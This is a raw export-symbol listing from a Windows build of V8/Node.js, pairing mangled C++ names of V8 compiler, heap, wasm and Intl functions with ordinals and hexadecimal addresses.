                                  ?ForJSIteratorResultDone@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59360x140edf2c0
                                  ?ForJSIteratorResultValue@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59370x140edf310
                                  ?ForJSObjectElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59380x140ee04b0
                                  ?ForJSObjectInObjectProperty@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@AEBVMapRef@234@H@Z59390x140ee04f0
                                  ?ForJSObjectOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@HW4WriteBarrierKind@234@@Z59400x140ee0550
                                  ?ForJSObjectPropertiesOrHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59410x140edf480
                                  ?ForJSObjectPropertiesOrHashKnownPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59420x140ee0590
                                  ?ForJSRegExpData@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59430x140edf310
                                  ?ForJSRegExpFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59440x140ee05d0
                                  ?ForJSRegExpLastIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59450x140ee0360
                                  ?ForJSRegExpSource@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59460x140edf2c0
                                  ?ForJSStringIteratorIndex@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59470x140ee0620
                                  ?ForJSStringIteratorString@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59480x140edf510
                                  ?ForJSTypedArrayBasePointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59490x140ee0680
                                  ?ForJSTypedArrayExternalPointer@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59500x140ee06c0
                                  ?ForJSTypedArrayLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59510x140ee0700
                                  ?ForMap@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59520x140ee0760
                                  ?ForMapBitField2@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59530x140ee07a0
                                  ?ForMapBitField3@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59540x140ee0800
                                  ?ForMapBitField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59550x140ee0860
                                  ?ForMapDescriptors@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59560x140ee08c0
                                  ?ForMapInstanceType@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59570x140ee0910
                                  ?ForMapPrototype@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59580x140ee0970
                                  ?ForModuleRegularExports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59590x140ee09c0
                                  ?ForModuleRegularImports@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59600x140ee0a10
                                  ?ForNameHashField@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59610x140ee0a60
                                  ?ForOrderedHashMapEntryValue@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ59620x140ee0ab0
                                  ?ForOrderedHashMapOrSetNextTable@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59630x140ee0af0
                                  ?ForOrderedHashMapOrSetNumberOfBuckets@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59640x140ee0060
                                  ?ForOrderedHashMapOrSetNumberOfDeletedElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59650x140ee0b40
                                  ?ForOrderedHashMapOrSetNumberOfElements@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59660x140ee0ba0
                                  ?ForPropertyArrayLengthAndHash@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59670x140ee0c00
                                  ?ForScopeInfoFlags@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59680x140edfae0
                                  ?ForScriptCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@VScript@23@@Z59690x140739e10
                                  ?ForSeqOneByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ59700x140ee0c60
                                  ?ForSeqTwoByteStringCharacter@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ59710x140ee0cb0
                                  ?ForSlicedStringOffset@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59720x140edfa80
                                  ?ForSlicedStringParent@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59730x140edf4c0
                                  ?ForStackArgument@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@XZ59740x140ee0d00
                                  ?ForStringLength@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59750x140ee0d40
                                  ?ForTest@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@@Z59760x140739ee0
                                  ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD@Z59770x1406f6eb0
                                  ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBD_K@Z59780x1406f6f50
                                  ?ForTesting@ScannerStream@internal@v8@@SA?AV?$unique_ptr@VUtf16CharacterStream@internal@v8@@U?$default_delete@VUtf16CharacterStream@internal@v8@@@std@@@std@@PEBG_K@Z59790x1406f6fe0
                                  ?ForThinStringActual@AccessBuilder@compiler@internal@v8@@SA?AUFieldAccess@234@XZ59800x140edf4c0
                                  ?ForToplevelCompile@UnoptimizedCompileFlags@internal@v8@@SA?AV123@PEAVIsolate@23@_NW4LanguageMode@23@W4REPLMode@23@@Z59810x140739f00
                                  ?ForToplevelFunction@ParseInfo@internal@v8@@SA?AV?$unique_ptr@VParseInfo@internal@v8@@U?$default_delete@VParseInfo@internal@v8@@@std@@@std@@VUnoptimizedCompileFlags@23@PEAVUnoptimizedCompileState@23@PEBVFunctionLiteral@23@PEBVAstRawString@23@@Z59820x140739fa0
                                  ?ForToplevelFunction@UnoptimizedCompileFlags@internal@v8@@SA?AV123@V123@PEBVFunctionLiteral@23@@Z59830x14073a020
                                  ?ForTypedArrayElement@AccessBuilder@compiler@internal@v8@@SA?AUElementAccess@234@W4ExternalArrayType@34@_NW4LoadSensitivity@34@@Z59840x140ee0da0
                                  ?ForceContextAllocationForParameters@Scope@internal@v8@@QEAAXXZ59850x140641980
                                  ?ForceContextForLanguageMode@Scope@internal@v8@@QEBA_NXZ59860x140641990
                                  ?ForceEagerCompilation@DeclarationScope@internal@v8@@QEAAXXZ59870x1406419c0
                                  ?Format@ErrorThrower@wasm@internal@v8@@AEAAXW4ErrorType@1234@PEBDPEAD@Z59880x14051b7b0
                                  ?Format@MessageFormatter@internal@v8@@SA?AV?$MaybeHandle@VString@internal@v8@@@23@PEAVIsolate@23@W4MessageTemplate@23@V?$Handle@VString@internal@v8@@@23@22@Z59890x1409715d0
                                  ?FormatError@WasmError@wasm@internal@v8@@KA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBDPEAD@Z59900x14051b830
                                  ?FormatErrorMessageForTest@PendingCompilationErrorHandler@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@PEAVIsolate@23@@Z59910x1407276e0
                                  ?FoundHtmlComment@Scanner@internal@v8@@QEBA_NXZ59920x140422f40
                                  ?FrameDropperTrampoline@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z59930x1409f9590
                                  ?FrameState@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@VBailoutId@34@VOutputFrameStateCombine@234@PEBVFrameStateFunctionInfo@234@@Z59940x140e0a850
                                  ?FrameStateCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ59950x14045a480
                                  ?Free@FreeListManyCached@internal@v8@@UEAA_K_K0W4FreeMode@23@@Z59960x1408d2ba0
                                  ?Free@InvalidatedSlotsCleanup@internal@v8@@QEAAX_K0@Z59970x1408cbd80
                                  ?Free@OS@base@v8@@CA_NPEAX_K@Z59980x140dc0920
                                  ?Free@PagedSpace@internal@v8@@QEAA_K_K0W4SpaceAccountingMode@23@@Z59990x140422f50
                                  ?Free@VirtualMemory@internal@v8@@QEAAXXZ60000x1405f4040
                                  ?FreeArrayBufferAllocator@node@@YAXPEAVArrayBufferAllocator@1@@Z60010x140076af0
                                  ?FreeBufferMemory@Delegate@ValueSerializer@v8@@UEAAXPEAX@Z60020x140250900
                                  ?FreeCode@NativeModule@wasm@internal@v8@@QEAAXV?$Vector@QEAVWasmCode@wasm@internal@v8@@@34@@Z60030x140570c80
                                  ?FreeCurrentEmbeddedBlob@internal@v8@@YAXXZ60040x14097dce0
                                  ?FreeDeadCode@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z60050x14055e970
                                  ?FreeDeadCodeLocked@WasmEngine@wasm@internal@v8@@QEAAXAEBV?$unordered_map@PEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@U?$hash@PEAVNativeModule@wasm@internal@v8@@@6@U?$equal_to@PEAVNativeModule@wasm@internal@v8@@@6@V?$allocator@U?$pair@QEAVNativeModule@wasm@internal@v8@@V?$vector@PEAVWasmCode@wasm@internal@v8@@V?$allocator@PEAVWasmCode@wasm@internal@v8@@@std@@@std@@@std@@@6@@std@@@Z60060x14055e9c0
                                  ?FreeDebugInfoListNode@Debug@internal@v8@@AEAAXPEAVDebugInfoListNode@23@0@Z60070x1409c01c0
                                  ?FreeEnvironment@node@@YAXPEAVEnvironment@1@@Z60080x140249450
                                  ?FreeIsolateData@node@@YAXPEAVIsolateData@1@@Z60090x140076af0
                                  ?FreeLinearAllocationArea@PagedSpace@internal@v8@@QEAAXXZ60100x1408d2ca0
                                  ?FreeListAddRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z60110x140dcab70
                                  ?FreeListFindRegion@RegionAllocator@base@v8@@AEAAPEAVRegion@123@_K@Z60120x140dcac70
                                  ?FreeListRemoveRegion@RegionAllocator@base@v8@@AEAAXPEAVRegion@123@@Z60130x140dcacb0
                                  ?FreeNativeModule@WasmCodeManager@wasm@internal@v8@@AEAAXV?$Vector@VVirtualMemory@internal@v8@@@34@_K@Z60140x140571070
                                  ?FreeNativeModule@WasmEngine@wasm@internal@v8@@QEAAXPEAVNativeModule@234@@Z60150x14055edb0
                                  ?FreePages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z60160x140dca090
                                  ?FreePages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z60170x140dc8b50
                                  ?FreePages@internal@v8@@YA_NPEAVPageAllocator@2@PEAX_K@Z60180x1405f40c0
                                  ?FreePlatform@node@@YAXPEAVMultiIsolatePlatform@1@@Z60190x140076af0
                                  ?FreeQueuedChunks@Unmapper@MemoryAllocator@internal@v8@@QEAAXXZ60200x1408d2e90
                                  ?FreeRegion@RegionAllocator@base@v8@@QEAA_K_K@Z60210x140dca130
                                  ?FreeThreadResources@Debug@internal@v8@@QEAAXXZ60220x1400768e0
                                  ?FreeThreadResources@Isolate@internal@v8@@QEAAXXZ60230x140422ff0
                                  ?FreeThreadResources@StackGuard@internal@v8@@QEAAXXZ60240x14096c960
                                  ?FreeUnmarkedObjects@LargeObjectSpace@internal@v8@@UEAAXXZ60250x14091ded0
                                  ?FreeUnmarkedObjects@OffThreadLargeObjectSpace@internal@v8@@UEAAXXZ60260x140422810
                                  ?Freeze@SignatureMap@wasm@internal@v8@@QEAAXXZ60270x1400eefb0
                                  ?From@GlobalHandles@internal@v8@@CAPEAV123@PEBVTracedNode@123@@Z60280x140965700
                                  ?FromAddress@Bitmap@internal@v8@@SAPEAV123@_K@Z60290x1400769f0
                                  ?FromByte@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@E@Z60300x140423000
                                  ?FromCompiledModule@WasmModuleObject@v8@@SA?AV?$MaybeLocal@VWasmModuleObject@v8@@@2@PEAVIsolate@2@AEBVCompiledWasmModule@2@@Z60310x140a851b0
                                  ?FromCurrentPage@PagedSpaceObjectIterator@internal@v8@@AEAA?AVHeapObject@23@XZ60320x14041ae00
                                  ?FromDays@TimeDelta@base@v8@@SA?AV123@H@Z60330x140dbfb50
                                  ?FromFiletime@Time@base@v8@@SA?AV123@U_FILETIME@@@Z60340x140dc2fe0
                                  ?FromHeap@Isolate@internal@v8@@SAPEAV123@PEAVHeap@23@@Z60350x14041aec0
                                  ?FromHeap@OffThreadIsolate@internal@v8@@SAPEAV123@PEAVOffThreadHeap@23@@Z60360x140423010
                                  ?FromHours@TimeDelta@base@v8@@SA?AV123@H@Z60370x140dbfb70
                                  ?FromInternalValue@?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@SA?AVThreadTicks@34@_J@Z60380x140076a70
                                  ?FromInternalValue@?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@SA?AVTime@34@_J@Z60390x140076a70
                                  ?FromInternalValue@?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@SA?AVTimeTicks@34@_J@Z60400x140076a70
                                  ?FromIsolate@WasmFeatures@wasm@internal@v8@@SA?AV1234@PEAVIsolate@34@@Z60410x140559610
                                  ?FromJsTime@Time@base@v8@@SA?AV123@N@Z60420x140dc3060
                                  ?FromJustIsNothing@V8@v8@@CAXXZ60430x140a85220
                                  ?FromMicroseconds@TimeDelta@base@v8@@SA?AV123@_J@Z60440x140076a70
                                  ?FromMilliseconds@TimeDelta@base@v8@@SA?AV123@_J@Z60450x140dbfb90
                                  ?FromMinutes@TimeDelta@base@v8@@SA?AV123@H@Z60460x140dbfba0
                                  ?FromNanoseconds@TimeDelta@base@v8@@SA?AV123@_J@Z60470x140dbfbc0
                                  ?FromNumber@BigInt@internal@v8@@SA?AV?$MaybeHandle@VBigInt@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z60480x14083b6d0
                                  ?FromOperand@Register@interpreter@internal@v8@@SA?AV1234@H@Z60490x140423020
                                  ?FromParameterIndex@Register@interpreter@internal@v8@@SA?AV1234@HH@Z60500x140870720
                                  ?FromRawAddress@ExternalReference@internal@v8@@SA?AV123@_K@Z60510x140076a70
                                  ?FromRoot@Isolate@internal@v8@@SAPEAV123@_K@Z60520x140423030
                                  ?FromSeconds@TimeDelta@base@v8@@SA?AV123@_J@Z60530x140dbfbf0
                                  ?FromSmi@LayoutDescriptor@internal@v8@@CA?AV123@VSmi@23@@Z60540x140076a70
                                  ?FromSnapshot@Context@v8@@SA?AV?$MaybeLocal@VContext@v8@@@2@PEAVIsolate@2@_KUDeserializeInternalFieldsCallback@2@PEAVExtensionConfiguration@2@V?$MaybeLocal@VValue@v8@@@2@PEAVMicrotaskQueue@2@@Z60550x140a85290
                                  ?FromSpaceContains@NewSpace@internal@v8@@QEAA_NVObject@23@@Z60560x14041aed0
                                  ?FromTypeBase@Type@compiler@internal@v8@@CA?AV1234@PEAVTypeBase@234@@Z60570x140076a70
                                  ?FroundType@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@@Z60580x140a63280
                                  ?Fulfill@JSPromise@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VJSPromise@internal@v8@@@23@V423@@Z60590x1407761a0
                                  ?FulfillPromise@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ60600x140eadda0
                                  ?FullIsNull@Value@v8@@AEBA_NXZ60610x140a85340
                                  ?FullIsString@Value@v8@@AEBA_NXZ60620x140a85370
                                  ?FullIsUndefined@Value@v8@@AEBA_NXZ60630x140a85390
                                  ?Function@AsmType@wasm@internal@v8@@SAPEAV1234@PEAVZone@34@PEAV1234@@Z60640x140a632d0
                                  ?Function@Type@compiler@internal@v8@@SA?AV1234@XZ60650x14045a490
                                  ?FunctionCount@ScriptData@Coverage@debug@v8@@QEBA_KXZ60660x140a85440
                                  ?FunctionForId@Runtime@internal@v8@@SAPEBUFunction@123@W4FunctionId@123@@Z60670x1406139c0
                                  ?FunctionKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z60680x1406fade0
                                  ?FunctionKindForImpl@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4FunctionKind@23@_NV?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@@Z60690x1406fae00
                                  ?FunctionName@FrameSummary@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@23@XZ60700x140989550
                                  ?FunctionName@ScopeInfo@internal@v8@@QEBA?AVObject@23@XZ60710x140758d70
                                  ?Function_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ60720x140423040
                                  ?Function_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ60730x140727780
                                  ?FuseFloatingControl@Scheduler@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@PEAVNode@234@@Z60740x140fb7ed0
                                  ?GarbageCollectionForTesting@EmbedderHeapTracer@v8@@QEAAXW4EmbedderStackState@cppgc@@@Z60750x140a856c0
                                  ?GenerateCode@CodeAssembler@compiler@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@34@PEAVCodeAssemblerState@234@AEBUAssemblerOptions@34@@Z60760x140e6e600
                                  ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAV?$unique_ptr@VJSHeapBroker@compiler@internal@v8@@U?$default_delete@VJSHeapBroker@compiler@internal@v8@@@std@@@std@@@Z60770x140e81c80
                                  ?GenerateCodeForTesting@Pipeline@compiler@internal@v8@@SA?AV?$MaybeHandle@VCode@internal@v8@@@34@PEAVOptimizedCompilationInfo@34@PEAVIsolate@34@PEAVCallDescriptor@234@PEAVGraph@234@AEBUAssemblerOptions@34@PEAVSchedule@234@@Z60780x140e81e70
                                  ?GenerateDeoptimizationData@CodeGenerator@compiler@internal@v8@@AEAA?AV?$Handle@VDeoptimizationData@internal@v8@@@34@XZ60790x140e4a8d0
                                  ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@AEAAXXZ60800x140fb8320
                                  ?GenerateDominatorTree@Scheduler@compiler@internal@v8@@SAXPEAVSchedule@234@@Z60810x140fb8350
                                  ?GenerateFarJumpTable@JumpTableAssembler@wasm@internal@v8@@SAX_KPEA_KHH@Z60820x14051fc80
                                  ?GenerateIdentityHash@Isolate@internal@v8@@QEAAHI@Z60830x14097ddd0
                                  ?GenerateLazyCompileTable@JumpTableAssembler@wasm@internal@v8@@SAX_KII0@Z60840x14051fdc0
                                  ?GenerateLiftoffDebugSideTable@wasm@internal@v8@@YA?AV?$unique_ptr@VDebugSideTable@wasm@internal@v8@@U?$default_delete@VDebugSideTable@wasm@internal@v8@@@std@@@std@@PEAVAccountingAllocator@23@PEAUCompilationEnv@123@AEBUFunctionBody@123@@Z60850x1405db7a0
                                  ?GenerateSpeculationPoisonFromCodeStartRegister@CodeGenerator@compiler@internal@v8@@AEAAXXZ60860x140495560
                                  ?GenerationSizesFromHeapSize@Heap@internal@v8@@SAX_KPEA_K1@Z60870x1409302a0
                                  ?GenerationalBarrierForCodeSlow@Heap@internal@v8@@SAXVCode@23@PEAVRelocInfo@23@VHeapObject@23@@Z60880x140930340
                                  ?GenerationalBarrierSlow@Heap@internal@v8@@SAXVHeapObject@23@_K0@Z60890x1409303c0
                                  ?GeneratorRestoreContext@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ60900x140eaddb0
                                  ?GeneratorRestoreContinuation@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ60910x140eaddc0
                                  ?GeneratorRestoreInputOrDebugPos@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ60920x140eaddd0
                                  ?GeneratorRestoreRegister@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z60930x140eadde0
                                  ?GeneratorStore@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z60940x140eadea0
                                  ?Generator_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ60950x140423050
                                  ?Generator_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ60960x140727790
                                  ?Get@BasicBlockProfiler@internal@v8@@SAPEAV123@XZ60970x1409aa500
                                  ?Get@ConsString@internal@v8@@QEAAGH@Z60980x1407483b0
                                  ?Get@DynamicBitSet@internal@v8@@QEBA_NI@Z60990x1406baf40
                                  ?Get@FlatStringReader@internal@v8@@QEAAHH@Z61000x140423060
                                  ?Get@FrameSummary@internal@v8@@SA?AV123@PEBVStandardFrame@23@H@Z61010x140989620
                                  ?Get@Map@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z61020x140a85730
                                  ?Get@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ61030x140a85b80
                                  ?Get@NativeContextStats@internal@v8@@QEBA_K_K@Z61040x14041af20
                                  ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@I@Z61050x140a85d70
                                  ?Get@Object@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z61060x140a861b0
                                  ?Get@PrimitiveArray@v8@@QEAA?AV?$Local@VPrimitive@v8@@@2@PEAVIsolate@2@H@Z61070x140a865a0
                                  ?Get@SlicedString@internal@v8@@QEAAGH@Z61080x140748430
                                  ?Get@StubCache@internal@v8@@QEAA?AVMaybeObject@23@VName@23@VMap@23@@Z61090x1408b4ea0
                                  ?Get@ThinString@internal@v8@@QEAAGH@Z61100x140748480
                                  ?Get@TypeCache@compiler@internal@v8@@SAPEBV1234@XZ61110x140ff1ad0
                                  ?Get@WasmImportWrapperCache@wasm@internal@v8@@QEBAPEAVWasmCode@234@W4WasmImportCallKind@compiler@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z61120x1405591c0
                                  ?Get@WasmTableObject@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@I@Z61130x14051fee0
                                  ?Get@WeakMap@debug@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@3@V?$Local@VContext@v8@@@3@V?$Local@VValue@v8@@@3@@Z61140x140a866c0
                                  ?GetAbsoluteOffset@BytecodeArrayAccessor@interpreter@internal@v8@@QEBAHH@Z61150x14089a9b0
                                  ?GetAbstractPC@Isolate@internal@v8@@QEAA_KPEAH0@Z61160x14097de90
                                  ?GetAccessorIndex@LookupIterator@internal@v8@@QEBAHXZ61170x14079c920
                                  ?GetAccessors@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ61180x14079c930
                                  ?GetAccumulatorUse@Bytecodes@interpreter@internal@v8@@SA?AW4AccumulatorUse@234@W4Bytecode@234@@Z61190x140423080
                                  ?GetAddress@CFunction@v8@@QEBAPEBXXZ61200x1400769d0
                                  ?GetAddressHint@CodeRangeAddressHint@internal@v8@@QEAA_K_K@Z61210x1408d2fe0
                                  ?GetAliases@RegisterConfiguration@internal@v8@@QEBAHW4MachineRepresentation@23@H0PEAH@Z61220x1409db990
                                  ?GetAlignedPointerFromEmbedderData@Context@v8@@QEAAPEAXH@Z61230x1400772e0
                                  ?GetAlignedPointerFromInternalField@Object@v8@@QEAAPEAXH@Z61240x140077030
                                  ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$PersistentBase@VObject@v8@@@2@H@Z61250x140076b50
                                  ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$TracedReferenceBase@VObject@v8@@@2@H@Z61260x140076b50
                                  ?GetAllocatableDoubleCode@RegisterConfiguration@internal@v8@@QEBAHH@Z61270x140451540
                                  ?GetAllocatableFloatCode@RegisterConfiguration@internal@v8@@QEBAHH@Z61280x140451550
                                  ?GetAllocatableGeneralCode@RegisterConfiguration@internal@v8@@QEBAHH@Z61290x140451560
                                  ?GetAllocatableSimd128Code@RegisterConfiguration@internal@v8@@QEBAHH@Z61300x140451570
                                  ?GetAllocatedSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ61310x14029f090
                                  ?GetAllocationProfile@HeapProfiler@v8@@QEAAPEAVAllocationProfile@2@XZ61320x140a86b10
                                  ?GetAndResetGlobalHandleResetCount@GlobalHandles@internal@v8@@QEAA_KXZ61330x140423090
                                  ?GetArgumentsType@DeclarationScope@internal@v8@@QEBA?AW4CreateArgumentsType@23@XZ61340x140641a10
                                  ?GetArrayBufferAllocator@Isolate@v8@@QEAAPEAVAllocator@ArrayBuffer@2@XZ61350x140427820
                                  ?GetArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@PEAVIsolateData@1@@Z61360x1402494f0
                                  ?GetAssignedOperand@LiveRange@compiler@internal@v8@@QEBA?AVInstructionOperand@234@XZ61370x140ef7770
                                  ?GetAsyncIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z61380x140a86b20
                                  ?GetAvailableLocales@JSCollator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61390x1407e47e0
                                  ?GetAvailableLocales@JSDateTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61400x1407aa480
                                  ?GetAvailableLocales@JSDisplayNames@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61410x1407d3920
                                  ?GetAvailableLocales@JSListFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61420x1407d1080
                                  ?GetAvailableLocales@JSNumberFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61430x1407c7a60
                                  ?GetAvailableLocales@JSPluralRules@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61440x1407ad350
                                  ?GetAvailableLocales@JSRelativeTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61450x1407aa480
                                  ?GetAvailableLocales@JSSegmenter@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ61460x1407a7ee0
